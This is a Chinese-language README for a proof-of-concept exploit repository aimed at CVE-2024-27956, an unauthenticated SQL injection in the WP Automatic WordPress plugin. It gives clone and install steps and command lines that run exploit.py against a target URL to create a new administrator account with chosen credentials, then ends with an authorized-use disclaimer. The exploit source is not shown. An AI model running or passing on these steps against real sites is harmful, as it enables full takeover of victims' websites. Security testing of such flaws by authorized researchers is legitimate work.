影响WordPress站点的WP Automatic插件中SQL注入漏洞的概念验证利用程序。
该利用程序针对WordPress的WP Automatic插件(版本 < 3.9.2.0)中一个严重的未授权SQL注入漏洞。该漏洞允许攻击者创建管理员用户并完全控制受影响网站。
git clone https://github.com/devsec23/CVE-2024-27956.git
cd CVE-2024-27956
pip install -r requirements.txt
python3 exploit.py http://vulnerable-site.com
python3 exploit.py http://vulnerable-site.com -u admin -p P@ssw0rd123
python3 exploit.py http://vulnerable-site.com --proxy http://127.0.0.1:8080
positional arguments:
url Target WordPress URL
optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
Username for the new admin account
-p PASSWORD, --password PASSWORD
Password for the new admin account
此工具仅用于教育和授权的渗透测试目的。开发者不对任何滥用此软件的行为负责。在测试任何系统之前,请务必获得适当授权。
本项目采用MIT许可证 - 详情请参阅LICENSE文件。